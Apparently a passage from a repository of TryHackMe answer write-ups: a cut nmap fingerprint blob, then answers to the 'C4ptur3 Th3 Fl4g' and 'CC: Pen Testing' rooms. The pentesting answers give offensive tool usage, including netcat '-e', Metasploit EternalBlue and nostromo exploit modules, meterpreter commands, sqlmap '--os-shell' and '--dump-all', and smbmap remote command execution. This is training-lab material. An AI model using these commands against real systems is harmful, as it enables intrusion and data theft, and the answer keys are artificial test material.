SF:tRequest,14FD,"HTTP/1\.0\x20200\x20OK\r\nDate:\x20Thu,\x2013\x20Aug\x20 67 | SF:2020\x2006:37:02\x20GMT\r\nConnection:\x20close\r\nX-Powered-By:\x20PHP 68 | SF:/7\.2\.32-1\+ubuntu18\.04\.1\+deb\.sury\.org\+1\r\nCache-Control:\x20pu 69 | SF:blic,\x20s-maxage=600\r\nDate:\x20Thu,\x2013\x20Aug\x202020\x2006:37:02 70 | SF:\x20GMT\r\nContent-Type:\x20text/html;\x20charset=UTF-8\r\nX-Debug-Toke 71 | SF:n:\x2092bfd5\r\n\r\n\n\n\x20\ 72 | SF:x20\x20\x20\n\x20\x20\x20\x20\x20\x20\x20\x20\n\x20\x20\x20\x20\x20\x20\x20\x20\n\x20\x20\x20\x2 75 | SF:0\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20Bolt\x20\|\x20A 76 | SF:\x20hero\x20is\x20unleashed\n\x20\x20\x20\x20\x20\x20\x20\x20\n\x20\x20\x20\x20\x20\x20\x20\x2 79 | SF:0\n\x20\x20\x20\x20\x20\x20\x20\x20\n\x20\x20 82 | SF:\x20\x20\t\n\x20\x20\x2 83 | SF:0\x20\t\ 84 | SF:n\x20\x20\x20\x20\n\x20\x20\x20\x20\n\x 85 | SF:20\x20\x20\x20\x20\x20\x20\x20\n\n\x20\x20\x20\x20\n\x20\x20\x20\x20\x20\ 93 | SF:x20\x20\x20\n\x20\x20\x20\x20\x20\x20\x20\x2 94 | SF:0\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2 96 | SF:0\x20\x20Bolt\x20\|\x20A\x20hero\x20is\x20unleashed\n\x2 97 | SF:0\x20\x20\x20\x20\x20\x20\x20\n 99 | SF:\x20\x20\x20\x20\x20\x20\x20\x20\n\x20\x20\x20\x20\x20\x20 101 | SF:\x20\x20\n\x20\x20\x20\x20\t\n\x20\x20\x20\x20\n\x20\x20\x20\x20\n\x 104 | SF:20\x20\x20\x20\x20\x20\x20\x206 C:89E C@F?5 323J C:89E C@F?5 Wcf E:>6DX : `You spin me right round baby right round (47 times)` 22 | 23 | ● - . .-.. . -.-. --- -- -- ..- -. .. -.-. .- - .. --- -.. -. -.-. --- -.. .. -. --. : `TELECOMMUNICATIONENCODING` 24 | 25 | ● 85 110 112 97 99 107 32 116 104 105 115 32 66 67 68 : `Unpack this BCD` 26 | 27 | ● LS0tLS0gLi0tLS0gLi0tLS0gLS0tLS0gLS0tLS0gLi0tLS0gLi0tLS0gLS0tLS0KLS0tLS0gLi0tLS0gLi0tLS0gLS0tLS0gLS0tLS0gLi0tLS0gLS0tLS0gLi0tLS0KLS0tLS0gLS0tLS0gLi0tLS0gLS0tLS0gLS0tLS0gLS0tLS0gLS0tLS0gLS0tLS0KLS0tLS0gLi0tLS0gLi0tLS0gLS0tLS0gLS0tLS0gLS0tLS0gLS0tLS0gLS0tLS0KLS0tLS0gLi0tLS0gLS0tLS0gLi0tLS0gLi0tLS0gLi0tLS0gLi0tLS0gLi0tLS0KLS0tLS0gLi0tLS0gLi0tLS0gLS0tLS0gLS0tLS0gLS0tLS0gLS0tLS0gLS0tLS0KLS0tLS0gLS0tLS0gLi0tLS0gLS0tLS0gLS0tLS0gLS0tLS0gLS0tLS0gLS0tLS0KLS0tLS0gLi0tLS0gLi0tLS0gLS0tLS0gLS0tLS0gLS0tLS0gLS0tLS0gLS0tLS0KLS0tLS0gLi0tLS0gLi0tLS0gLS0tLS0gLS0tLS0gLS0tLS0gLS0tLS0gLS0tLS0KLS0tLS0gLi0tLS0gLi0tLS0gLS0tLS0gLS0tLS0gLi0tLS0gLS0tLS0gLi0tLS0KLS0tLS0gLS0tLS0gLi0tLS0gLS0tLS0gLS0tLS0gLS0tLS0gLS0tLS0gLS0tLS0KLS0tLS0gLi0tLS0gLi0tLS0gLS0tLS0gLS0tLS0gLS0tLS0gLi0tLS0gLS0tLS0KLS0tLS0gLi0tLS0gLi0tLS0gLS0tLS0gLi0tLS0gLS0tLS0gLS0tLS0gLS0tLS0KLS0tLS0gLS0tLS0gLi0tLS0gLS0tLS0gLS0tLS0gLS0tLS0gLS0tLS0gLS0tLS0KLS0tLS0gLi0tLS0gLi0tLS0gLS0tLS0gLS0tLS0gLS0tLS0gLS0tLS0gLS0tLS0KLS0tLS0gLi0tLS0gLi0tLS0gLS0tLS0gLS0tLS0gLS0tLS0gLS0tLS0gLS0tLS0KLS0tLS0gLi0tLS0gLi0tLS0gLS0tLS0gLS0tLS0gLi0tLS0gLS0tLS0gLS0tLS0KLS0tLS0gLS0tLS0gLi0tLS0gLS0tLS0gLS0tLS0gLS0tLS0gLS0tLS0gLS0tLS0KLS0tLS0gLi0tLS0gLi0tLS0gLS0tLS0gLS0tLS0gLS0tLS0gLi0tLS0gLS0tLS0KLS0tLS0gLi0tLS0gLi0tLS0gLS0tLS0gLS0tLS0gLS0tLS0gLS0tLS0gLi0tLS0KLS0tLS0gLS0tLS0gLi0tLS0gLS0tLS0gLS0tLS0gLS0tLS0gLS0tLS0gLS0tLS0KLS0tLS0gLi0tLS0gLi0tLS0gLS0tLS0gLS0tLS0gLS0tLS0gLS0tLS0gLS0tLS0KLS0tLS0gLi0tLS0gLS0tLS0gLi0tLS0gLi0tLS0gLi0tLS0gLi0tLS0gLi0tLS0KLS0tLS0gLi0tLS0gLi0tLS0gLS0tLS0gLi0tLS0gLS0tLS0gLS0tLS0gLS0tLS0KLS0tLS0gLS0tLS0gLi0tLS0gLS0tLS0gLS0tLS0gLS0tLS0gLS0tLS0gLS0tLS0KLS0tLS0gLi0tLS0gLi0tLS0gLS0tLS0gLi0tLS0gLS0tLS0gLS0tLS0gLS0tLS0KLS0tLS0gLi0tLS0gLi0tLS0gLS0tLS0gLS0tLS0gLi0tLS0gLi0tLS0gLS0tLS0KLS0tLS0gLS0tLS0gLi0tLS0gLS0tLS0gLS0tLS0gLS0tLS0gLS0tLS0gLS0tLS0KLS0tLS0gLi0tLS0gLi0tLS0gLS0tLS0gLS0tLS0gLS0tLS0gLS0tLS0gLS0tLS0KLS0tLS0gLi0tLS0gLS0tLS0gLi0tLS0gLi0tLS0gLi0tLS0gLi0tLS0gLi0tLS0KLS0tLS0gLi0tLS0gLi0tLS0gLS0tLS0gLS0tLS0gLi0tLS0gLi0tLS0gLS0tLS0KLS0tLS0gLS0tLS0gLi0tLS0gLS0tLS0gLS0tLS0gLS0tLS0gLS0tLS0gLS0tLS0KLS0tLS0gLi0tLS0gLi0tLS0gLS0tLS0gLS0tLS0gLS0tLS0gLS0tLS0gLS0tLS0KLS0tLS0gLi0tLS0gLS0tLS0gLi0tLS0gLi0tLS0gLi0tLS0gLi0tLS0gLi0tLS0KLS0tLS0gLi0tLS0gLi0tLS0gLS0tLS0gLS0tLS0gLS0tLS0gLS0tLS0gLS0tLS0KLS0tLS0gLS0tLS0gLi0tLS0gLS0tLS0gLS0tLS0gLS0tLS0gLS0tLS0gLS0tLS0KLS0tLS0gLi0tLS0gLi0tLS0gLS0tLS0gLS0tLS0gLS0tLS0gLi0tLS0gLS0tLS0KLS0tLS0gLi0tLS0gLi0tLS0gLS0tLS0gLS0tLS0gLS0tLS0gLS0tLS0gLi0tLS0KLS0tLS0gLS0tLS0gLi0tLS0gLS0tLS0gLS0tLS0gLS0tLS0gLS0tLS0gLS0tLS0KLS0tLS0gLi0tLS0gLi0tLS0gLS0tLS0gLS0tLS0gLS0tLS0gLS0tLS0gLS0tLS0KLS0tLS0gLi0tLS0gLi0tLS0gLS0tLS0gLS0tLS0gLS0tLS0gLS0tLS0gLS0tLS0KLS0tLS0gLi0tLS0gLi0tLS0gLS0tLS0gLS0tLS0gLi0tLS0gLS0tLS0gLi0tLS0KLS0tLS0gLS0tLS0gLi0tLS0gLS0tLS0gLS0tLS0gLS0tLS0gLS0tLS0gLS0tLS0KLS0tLS0gLi0tLS0gLi0tLS0gLS0tLS0gLS0tLS0gLS0tLS0gLS0tLS0gLS0tLS0KLS0tLS0gLi0tLS0gLS0tLS0gLi0tLS0gLi0tLS0gLi0tLS0gLi0tLS0gLi0tLS0KLS0tLS0gLi0tLS0gLi0tLS0gLS0tLS0gLS0tLS0gLS0tLS0gLi0tLS0gLi0tLS0KLS0tLS0gLS0tLS0gLi0tLS0gLS0tLS0gLS0tLS0gLS0tLS0gLS0tLS0gLS0tLS0KLS0tLS0gLi0tLS0gLi0tLS0gLS0tLS0gLS0tLS0gLS0tLS0gLS0tLS0gLS0tLS0KLS0tLS0gLi0tLS0gLS0tLS0gLi0tLS0gLi0tLS0gLi0tLS0gLi0tLS0gLi0tLS0KLS0tLS0gLi0tLS0gLi0tLS0gLS0tLS0gLS0tLS0gLi0tLS0gLS0tLS0gLS0tLS0KLS0tLS0gLS0tLS0gLi0tLS0gLS0tLS0gLS0tLS0gLS0tLS0gLS0tLS0gLS0tLS0KLS0tLS0gLi0tLS0gLi0tLS0gLS0tLS0gLS0tLS0gLS0tLS0gLS0tLS0gLS0tLS0KLS0tLS0gLi0tLS0gLi0tLS0gLS0tLS0gLS0tLS0gLS0tLS0gLS0tLS0gLS0tLS0KLS0tLS0gLi0tLS0gLi0tLS0gLS0tLS0gLS0tLS0gLi0tLS0gLS0tLS0gLS0tLS0KLS0tLS0gLS0tLS0gLi0tLS0gLS0tLS0gLS0tLS0gLS0tLS0gLS0tLS0gLS0tLS0KLS0tLS0gLi0tLS0gLi0tLS0gLS0tLS0gLS0tLS0gLS0tLS0gLi0tLS0gLS0tLS0KLS0tLS0gLi0tLS0gLi0tLS0gLS0tLS0gLS0tLS0gLS0tLS0gLS0tLS0gLi0tLS0KLS0tLS0gLS0tLS0gLi0tLS0gLS0tLS0gLS0tLS0gLS0tLS0gLS0tLS0gLS0tLS0KLS0tLS0gLi0tLS0gLi0tLS0gLS0tLS0gLi0tLS0gLS0tLS0gLS0tLS0gLS0tLS0KLS0tLS0gLi0tLS0gLi0tLS0gLS0tLS0gLS0tLS0gLi0tLS0gLi0tLS0gLS0tLS0KLS0tLS0gLS0tLS0gLi0tLS0gLS0tLS0gLS0tLS0gLS0tLS0gLS0tLS0gLS0tLS0KLS0tLS0gLi0tLS0gLi0tLS0gLS0tLS0gLS0tLS0gLS0tLS0gLi0tLS0gLS0tLS0KLS0tLS0gLi0tLS0gLi0tLS0gLS0tLS0gLS0tLS0gLS0tLS0gLS0tLS0gLi0tLS0KLS0tLS0gLS0tLS0gLi0tLS0gLS0tLS0gLS0tLS0gLS0tLS0gLS0tLS0gLS0tLS0KLS0tLS0gLi0tLS0gLi0tLS0gLS0tLS0gLi0tLS0gLS0tLS0gLS0tLS0gLS0tLS0KLS0tLS0gLi0tLS0gLi0tLS0gLS0tLS0gLS0tLS0gLi0tLS0gLi0tLS0gLi0tLS0KLS0tLS0gLS0tLS0gLi0tLS0gLS0tLS0gLS0tLS0gLS0tLS0gLS0tLS0gLS0tLS0KLS0tLS0gLi0tLS0gLi0tLS0gLS0tLS0gLS0tLS0gLS0tLS0gLS0tLS0gLS0tLS0KLS0tLS0gLi0tLS0gLS0tLS0gLi0tLS0gLi0tLS0gLi0tLS0gLi0tLS0gLi0tLS0KLS0tLS0gLi0tLS0gLi0tLS0gLS0tLS0gLS0tLS0gLi0tLS0gLS0tLS0gLS0tLS0KLS0tLS0gLS0tLS0gLi0tLS0gLS0tLS0gLS0tLS0gLS0tLS0gLS0tLS0gLS0tLS0KLS0tLS0gLi0tLS0gLi0tLS0gLS0tLS0gLS0tLS0gLS0tLS0gLS0tLS0gLS0tLS0KLS0tLS0gLi0tLS0gLi0tLS0gLS0tLS0gLS0tLS0gLS0tLS0gLS0tLS0gLS0tLS0KLS0tLS0gLi0tLS0gLi0tLS0gLS0tLS0gLS0tLS0gLi0tLS0gLS0tLS0gLi0tLS0KLS0tLS0gLS0tLS0gLi0tLS0gLS0tLS0gLS0tLS0gLS0tLS0gLS0tLS0gLS0tLS0KLS0tLS0gLi0tLS0gLi0tLS0gLS0tLS0gLS0tLS0gLS0tLS0gLi0tLS0gLS0tLS0KLS0tLS0gLi0tLS0gLi0tLS0gLS0tLS0gLS0tLS0gLS0tLS0gLS0tLS0gLi0tLS0KLS0tLS0gLS0tLS0gLi0tLS0gLS0tLS0gLS0tLS0gLS0tLS0gLS0tLS0gLS0tLS0KLS0tLS0gLi0tLS0gLi0tLS0gLS0tLS0gLS0tLS0gLS0tLS0gLS0tLS0gLS0tLS0KLS0tLS0gLi0tLS0gLi0tLS0gLS0tLS0gLS0tLS0gLS0tLS0gLS0tLS0gLS0tLS0KLS0tLS0gLi0tLS0gLi0tLS0gLS0tLS0gLS0tLS0gLi0tLS0gLS0tLS0gLi0tLS0KLS0tLS0gLS0tLS0gLi0tLS0gLS0tLS0gLS0tLS0gLS0tLS0gLS0tLS0gLS0tLS0KLS0tLS0gLi0tLS0gLi0tLS0gLS0tLS0gLS0tLS0gLS0tLS0gLS0tLS0gLS0tLS0KLS0tLS0gLi0tLS0gLi0tLS0gLS0tLS0gLS0tLS0gLS0tLS0gLS0tLS0gLS0tLS0KLS0tLS0gLi0tLS0gLi0tLS0gLS0tLS0gLS0tLS0gLS0tLS0gLi0tLS0gLi0tLS0KLS0tLS0gLS0tLS0gLi0tLS0gLS0tLS0gLS0tLS0gLS0tLS0gLS0tLS0gLS0tLS0KLS0tLS0gLi0tLS0gLi0tLS0gLS0tLS0gLS0tLS0gLS0tLS0gLS0tLS0gLS0tLS0KLS0tLS0gLi0tLS0gLS0tLS0gLi0tLS0gLi0tLS0gLi0tLS0gLi0tLS0gLi0tLS0KLS0tLS0gLi0tLS0gLi0tLS0gLS0tLS0gLS0tLS0gLi0tLS0gLS0tLS0gLS0tLS0KLS0tLS0gLS0tLS0gLi0tLS0gLS0tLS0gLS0tLS0gLS0tLS0gLS0tLS0gLS0tLS0KLS0tLS0gLi0tLS0gLi0tLS0gLS0tLS0gLi0tLS0gLS0tLS0gLS0tLS0gLS0tLS0KLS0tLS0gLi0tLS0gLi0tLS0gLS0tLS0gLi0tLS0gLS0tLS0gLS0tLS0gLS0tLS0KLS0tLS0gLS0tLS0gLi0tLS0gLS0tLS0gLS0tLS0gLS0tLS0gLS0tLS0gLS0tLS0KLS0tLS0gLi0tLS0gLi0tLS0gLS0tLS0gLS0tLS0gLS0tLS0gLS0tLS0gLS0tLS0KLS0tLS0gLi0tLS0gLS0tLS0gLi0tLS0gLi0tLS0gLi0tLS0gLi0tLS0gLi0tLS0KLS0tLS0gLi0tLS0gLi0tLS0gLS0tLS0gLS0tLS0gLi0tLS0gLi0tLS0gLS0tLS0KLS0tLS0gLS0tLS0gLi0tLS0gLS0tLS0gLS0tLS0gLS0tLS0gLS0tLS0gLS0tLS0KLS0tLS0gLi0tLS0gLi0tLS0gLS0tLS0gLS0tLS0gLS0tLS0gLS0tLS0gLS0tLS0KLS0tLS0gLi0tLS0gLS0tLS0gLi0tLS0gLi0tLS0gLi0tLS0gLi0tLS0gLi0tLS0KLS0tLS0gLi0tLS0gLi0tLS0gLS0tLS0gLS0tLS0gLi0tLS0gLS0tLS0gLS0tLS0KLS0tLS0gLS0tLS0gLi0tLS0gLS0tLS0gLS0tLS0gLS0tLS0gLS0tLS0gLS0tLS0KLS0tLS0gLi0tLS0gLi0tLS0gLS0tLS0gLS0tLS0gLS0tLS0gLS0tLS0gLS0tLS0KLS0tLS0gLi0tLS0gLS0tLS0gLi0tLS0gLi0tLS0gLi0tLS0gLi0tLS0gLi0tLS0KLS0tLS0gLi0tLS0gLi0tLS0gLS0tLS0gLS0tLS0gLS0tLS0gLS0tLS0gLS0tLS0KLS0tLS0gLS0tLS0gLi0tLS0gLS0tLS0gLS0tLS0gLS0tLS0gLS0tLS0gLS0tLS0KLS0tLS0gLi0tLS0gLi0tLS0gLS0tLS0gLS0tLS0gLS0tLS0gLS0tLS0gLS0tLS0KLS0tLS0gLi0tLS0gLi0tLS0gLS0tLS0gLS0tLS0gLS0tLS0gLS0tLS0gLS0tLS0KLS0tLS0gLi0tLS0gLi0tLS0gLS0tLS0gLS0tLS0gLS0tLS0gLi0tLS0gLi0tLS0KLS0tLS0gLS0tLS0gLi0tLS0gLS0tLS0gLS0tLS0gLS0tLS0gLS0tLS0gLS0tLS0KLS0tLS0gLi0tLS0gLi0tLS0gLS0tLS0gLS0tLS0gLS0tLS0gLi0tLS0gLi0tLS0KLS0tLS0gLi0tLS0gLi0tLS0gLS0tLS0gLS0tLS0gLi0tLS0gLS0tLS0gLi0tLS0KLS0tLS0gLS0tLS0gLi0tLS0gLS0tLS0gLS0tLS0gLS0tLS0gLS0tLS0gLS0tLS0KLS0tLS0gLi0tLS0gLi0tLS0gLS0tLS0gLS0tLS0gLS0tLS0gLi0tLS0gLi0tLS0KLS0tLS0gLi0tLS0gLi0tLS0gLS0tLS0gLS0tLS0gLi0tLS0gLS0tLS0gLi0tLS0KLS0tLS0gLS0tLS0gLi0tLS0gLS0tLS0gLS0tLS0gLS0tLS0gLS0tLS0gLS0tLS0KLS0tLS0gLi0tLS0gLi0tLS0gLS0tLS0gLS0tLS0gLS0tLS0gLi0tLS0gLi0tLS0KLS0tLS0gLi0tLS0gLi0tLS0gLS0tLS0gLS0tLS0gLi0tLS0gLS0tLS0gLi0tLS0= : `Let's make this a bit trickier...` 28 | 29 | ### [Task 2] Hashes 30 | 31 | A hash function is any function that can be used to map data of arbitrary size onto data of a fixed size. The values returned by a hash function are called hash values, hashcodes, digests, or simply hashes. Crack the following hashes to reveal the answers. Hashcat bruteforce is probably the easiest way to complete this challenge, or try CyberChef and md5hasing.net if you want to go easy-mode. Reference this website for known hash types 32 | 33 | ● 39d4a2ba07e44421c9bedd54dc4e1182 : `MDwhat?` 34 | 35 | ● e0418e7c6c2f630c71b2acabbcf8a2fb : `digest the message algorithm` 36 | 37 | ● efbd448a935421a54dda43da43a701e1 : `128-bit of delicious hash values` 38 | 39 | ● 11FE61CE0639AC2A1E815D62D7DEEC53 : `Microsoft has encryption?` 40 | 41 | ● a361f05487b879f25cc4d7d7fae3c7442e7849ed15c94010b389faafaf8763f0dd022e52364027283d55dcb10974b09e7937f901584c092da65a14d1aa8dc4d8 : `1024 bit blocks!` 42 | 43 | ● d48a2f790f7294a4ecbac10b99a1a4271cdc67fff7246a314297f2bca2aaa71f : `Commonly used in Blockchain` 44 | 45 | ● a34e50c78f67d3ec5d0479cde1406c6f82ff6cd0 : `The OG` 46 | 47 | ### [Task 3] Spectrograms 48 | 49 | A spectrogram is a visual representation of the spectrum of frequencies of a signal as it varies with time. When applied to an audio signal, spectrograms are sometimes called sonographs, voiceprints, or voicegrams. When the data is represented in a 3D plot they may be called waterfalls. 50 | 51 | ● Download the file : `Super Secret Message` 52 | 53 | ### [Task 4] Steganography 54 | 55 | Steganography is the practice of concealing a file, message, image, or video within another file, message, image, or video. 56 | 57 | ● Decode the image to reveal the answer. : `SpaghettiSteg` 58 | 59 | ### [Task 5] Security through obscurity 60 | 61 | Security through obscurity is the reliance in security engineering on the secrecy of the design or implementation as the main method of providing security for a system or component of a system. 62 | 63 | ● Download and get 'inside' the file. What is the first filename & extension? : `hackerchat.png` 64 | 65 | ● Get inside the archive and inspect the file carefully. Find the hidden text. : `"AHH_YOU_FOUND_ME!"` 66 | -------------------------------------------------------------------------------- /C4ptur3 Th3 Fl4g/secretaudio.wav: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/thehackingsage/tryhackme/3fa7bb79139d4098f0abf13bc65d742f3ad7fa25/C4ptur3 Th3 Fl4g/secretaudio.wav -------------------------------------------------------------------------------- /C4ptur3 Th3 Fl4g/stegosteg.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/thehackingsage/tryhackme/3fa7bb79139d4098f0abf13bc65d742f3ad7fa25/C4ptur3 Th3 Fl4g/stegosteg.jpg -------------------------------------------------------------------------------- /CC-Pentesting/README.md: -------------------------------------------------------------------------------- 1 | # CC: Pen Testing | https://tryhackme.com/room/ccpentesting 2 | 3 | ### [Task 2] [Section 1 - Network Utilities] - nmap 4 | 5 | #1 What does nmap stand for? : ```Network Mapper``` 6 | 7 | #2 How do you specify which port(s) to scan? : ```-p``` 8 | 9 | #3 How do you do a "ping scan"(just tests if the host(s) is up)? : ```-sn``` 10 | 11 | #4 What is the flag for a UDP scan? : ```-sU``` 12 | 13 | #5 How do you run default scripts? : ```-sC``` 14 | 15 | #6 How do you enable "aggressive mode"(Enables OS detection, version detection, script scanning, and traceroute) : ```-A``` 16 | 17 | #7 What flag enables OS detection : ```-O``` 18 | 19 | #8 How do you get the versions of services running on the target machine : ```-sV``` 20 | 21 | #9 Deploy the machine : ```No answer needed``` 22 | 23 | #10 How many ports are open on the machine? : ```1``` 24 | 25 | #11 What service is running on the machine? : ```Apache``` 26 | 27 | #12 What is the version of the service? : ```2.4.18``` 28 | 29 | #13 What is the output of the http-title script(included in default scripts) : ```Apache2 Ubuntu Default Page: It Works``` 30 | 31 | ### [Task 3] [Section 1 - Network Utilities] - Netcat 32 | 33 | #1 How do you listen for connections? ```-l``` 34 | 35 | #2 How do you enable verbose mode(allows you to see who connected to you)? : ```-v``` 36 | 37 | #3 How do you specify a port to listen on : ```-p``` 38 | 39 | #4 How do you specify which program to execute after you connect to a host(One of the most infamous)? : ```-e``` 40 | 41 | #5 How do you connect to udp ports : ```-u``` 42 | 43 | ### [Task 4] [Section 2 - Web Enumeration] - gobuster 44 | 45 | #1 How do you specify directory/file brute forcing mode? : ```dir``` 46 | 47 | #2 How do you specify dns bruteforcing mode? : ```dns``` 48 | 49 | #3 What flag sets extensions to be used? : Example: if the php extension is set, and the word is "admin" then gobuster will test admin.php against the webserver : ```-x``` 50 | 51 | #4 What flag sets a wordlist to be used? : ```-w``` 52 | 53 | #5 How do you set the Username for basic authentication(If the directory requires a username/password)? : ```-U``` 54 | 55 | #6 How do you set the password for basic authentication? : ```-P``` 56 | 57 | #7 How do you set which status codes gobuster will interpret as valid? : ```-s``` 58 | 59 | #8 How do you skip ssl certificate verification? : ```-k``` 60 | 61 | #9 How do you specify a User-Agent? : ```-a``` 62 | 63 | #10 How do you specify a HTTP header? : ```-H``` 64 | 65 | #11 What flag sets the URL to bruteforce? : ```-u``` 66 | 67 | #13 What is the name of the hidden directory : ```secret``` 68 | 69 | #14 What is the name of the hidden file with the extension xxa : ```password``` 70 | 71 | ### [Task 5] [Section 2 - Web Enumeration] - nikto 72 | 73 | #1 How do you specify which host to use? : ```-h``` 74 | 75 | #2 What flag disables ssl? : ```-nossl``` 76 | 77 | #3 How do you force ssl? ```-ssl``` 78 | 79 | #4 How do you specify authentication(username + pass)? : ```-id``` 80 | 81 | #5 How do you select which plugin to use? : ```-plugins``` 82 | 83 | #6 Which plugin checks if you can enumerate apache users? : ```apacheusers``` 84 | #7 How do you update the plugin list : ```-update``` 85 | 86 | #8 How do you list all possible plugins to use : ```--list-plugins``` 87 | 88 | ### [Task 7] [Section 3 Metasploit]: Setting Up 89 | 90 | #1 What command allows you to search modules? : ```search``` 91 | 92 | #2 How to you select a module? : ```use``` 93 | 94 | #3 How do you display information about a specific module? : ```info``` 95 | 96 | #4 How do you list options that you can set? : ```options``` 97 | 98 | #5 What command lets you view advanced options for a specific module? : ```advanced``` 99 | 100 | #6 How do you show options in a specific category : ```show``` 101 | 102 | ### [Task 8] [Section 3 - Metasploit]: - Selecting a module 103 | 104 | #1 How do you select the eternalblue module? : ```use exploit/windows/smb/ms17_010_eternalblue``` 105 | 106 | #2 What option allows you to select the target host(s)? : ```RHOSTS``` 107 | 108 | #3 How do you set the target port? : ```RPORT``` 109 | 110 | #4 What command allows you to set options? : ```set``` 111 | 112 | #5 How would you set SMBPass to "username"? : ```set SMBPass username``` 113 | 114 | #6 How would you set the SMBUser to "password"? : ```set SMBUser password``` 115 | 116 | #7 What option sets the architecture to be exploited? : ```arch``` 117 | 118 | #8 What option sets the payload to be sent to the target machine? : ```payload``` 119 | 120 | #9 Once you've finished setting all the required options, how do you run the exploit? : ```exploit``` 121 | 122 | #10 What flag do you set if you want the exploit to run in the background? : ```-j``` 123 | 124 | #11 How do you list all current sessions? : ```sessions``` 125 | 126 | #12 What flag allows you to go into interactive mode with a session("drops you either into a meterpreter or regular shell") : ```-i``` 127 | 128 | ### [Task 9] [Section 3 - Metasploit]: meterpreter 129 | 130 | #1 What command allows you to download files from the machine? : ```download``` 131 | 132 | #2 What command allows you to upload files to the machine? : ```upload``` 133 | 134 | #3 How do you list all running processes? : ```ps``` 135 | 136 | #4 How do you change processes on the victim host(Ideally it will allow you to change users and gain the perms associated with that user) : ```migrate``` 137 | 138 | #5 What command lists files in the current directory on the remote machine? : ```ls``` 139 | 140 | #6 How do you execute a command on the remote host? : ```execute``` 141 | 142 | #7 What command starts an interactive shell on the remote host? : ```shell``` 143 | 144 | #8 How do you find files on the target host(Similar function to the linux command "find") : ```search``` 145 | 146 | #9 How do you get the output of a file on the remote host? : ```cat``` 147 | 148 | #10 How do you put a meterpreter shell into "background mode"(allows you to run other msf modules while also keeping the meterpreter shell as a session)? : ```background``` 149 | 150 | ### [Task 10] [Section 3 - Metasploit]: Final Walkthrough 151 | 152 | #1 Select the module that needs to be exploited : ```use exploit/multi/http/nostromo_code_exec``` 153 | 154 | #2 What variable do you need to set, to select the remote host : ```rhosts``` 155 | 156 | #3 How do you set the port to 80 : ```set rport 80``` 157 | 158 | #4 How do you set listening address(Your machine) : ```lhost``` 159 | 160 | #5 Exploit the machine! : ```No answer needed``` 161 | 162 | #6 What is the name of the secret directory in the /var/nostromo/htdocs directory? : ```s3cretd1r``` 163 | 164 | #7 What are the contents of the file inside of the directory? : ```Woohoo!``` 165 | 166 | ### [Task 13] [Section 4 - Hash Cracking]: hashcat 167 | 168 | https://hashcat.net/wiki/doku.php?id=example_hashes 169 | 170 | #1 What flag sets the mode. : ```-m``` 171 | 172 | #2 What flag sets the "attack mode" : ```-a``` 173 | 174 | #3 What is the attack mode number for Brute-force : ```3``` 175 | 176 | #4 What is the mode number for SHA3-512 : ```17600``` 177 | 178 | #5 Crack This Hash: 56ab24c15b72a457069c5ea42fcfc640(Type: MD5) : ```happy``` 179 | 180 | #6 Crack this hash: 4bc9ae2b9236c2ad02d81491dcb51d5f(Type: MD4) : ```nootnoot``` 181 | 182 | ### [Task 14] [Section 4 - Hash Cracking]: John The Ripper 183 | 184 | Note: There are multiple variations of jtr out there. For this task the version that comes pre-installed on kali will be used 185 | 186 | Note 2: All hashes can be cracked with rockyou.txt 187 | 188 | #1 What flag let's you specify which wordlist to use? : ```--wordlist``` 189 | 190 | #2 What flag lets you specify which hash format(Ex: MD5,SHA1 etc.) to use? : ```--format``` 191 | 192 | #3 How do you specify which rule to use? : ```--rules``` 193 | 194 | #4 Crack this hash: 5d41402abc4b2a76b9719d911017c592 (Type: MD5) : ```hello``` 195 | 196 | #5 Crack this hash: 5baa61e4c9b93f3f0682250b6cf8331b7ee68fd8(Type: SHA1) : ```password``` 197 | 198 | ### [Task 16] [Section 5 - SQL Injection]: sqlmap 199 | 200 | #1 How do you specify which url to check? : ```-u``` 201 | 202 | #2 What about which google dork to use? : ```-g``` 203 | 204 | #3 How do you select(lol) which parameter to use?(Example: in the url http://ex.com?test=1 the parameter would be test.) : ```-p``` 205 | 206 | #4 What flag sets which database is in the target host's backend?(Example: If the flag is set to mysql then sqlmap will only test mysql injections). : ```--dbms``` 207 | 208 | #5 How do you select the level of depth sqlmap should use(Higher = more accurate and more tests in general). : ```--level``` 209 | 210 | #6 How do you dump the table entries of the database? : ```--dump``` 211 | 212 | #7 Which flag sets which db to enumerate? (Case sensitive) : ```-D``` 213 | 214 | #8 Which flag sets which table to enumerate? (Case sensitive) : ```-T``` 215 | 216 | #9 Which flag sets which column to enumerate? (Case sensitive) : ```-C``` 217 | 218 | #10 How do you ask sqlmap to try to get an interactive os-shell? : ```--os-shell``` 219 | 220 | #11 What flag dumps all data from every table : ```--dump-all``` 221 | 222 | ### [Task 18] [Section 5 - SQL Injection]: Vulnerable Web Application 223 | 224 | #2 How many types of sqli is the site vulnerable too? : ```3``` 225 | 226 | #4 What is the name of the database? : ```tests``` 227 | 228 | #5 How many tables are in the database? : ```2``` 229 | 230 | #6 What is the value of the flag? : ```found_me``` 231 | 232 | ### [Task 20] [Section 6 - Samba]: smbmap 233 | 234 | #1 How do you set the username to authenticate with? : ```-u``` 235 | 236 | #2 What about the password? : ```-p``` 237 | 238 | #3 How do you set the host? : ```-H``` 239 | 240 | #4 What flag runs a command on the server(assuming you have permissions that is)? : ```-x``` 241 | 242 | #5 How do you specify the share to enumerate? : ```-s``` 243 | 244 | #6 How do you set which domain to enumerate? : ```-d``` 245 | 246 | #7 What flag downloads a file? : ```--download``` 247 | 248 | #8 What about uploading one? : ```--upload``` 249 | 250 | #9 Given the username "admin", the password "password", and the ip "10.10.10.10", how would you run ipconfig on that machine : ```smbmap -u "admin" -p "password" -H 10.10.10.10 -x "ipconfig"``` 251 | 252 | ### [Task 21] [Section 6 - Samba]: smbclient 253 | 254 | #1 How do you specify which domain(workgroup) to use when connecting to the host? : ```-w``` 255 | 256 | #2 How do you specify the ip address of the host? : ```-I``` 257 | 258 | #3 How do you run the command "ipconfig" on the target machine? ```-c "ipconfig"``` 259 | 260 | #4 How do you specify the username to authenticate with? : ```-U``` 261 | 262 | #5 How do you specify the password to authenticate with? : ```-P``` 263 | 264 | #6 What flag is set to tell smbclient to not use a password? ```-N``` 265 | 266 | #7 While in the interactive prompt, how would you download the file test, assuming it was in the current directory? : ```get test``` 267 | 268 | #8 In the interactive prompt, how would you upload your /etc/hosts file : ```put /etc/hosts``` 269 | 270 | ### [Task 24] [Section 7 - Final Exam]: Good Luck :D 271 | 272 | #1 What is the user.txt : 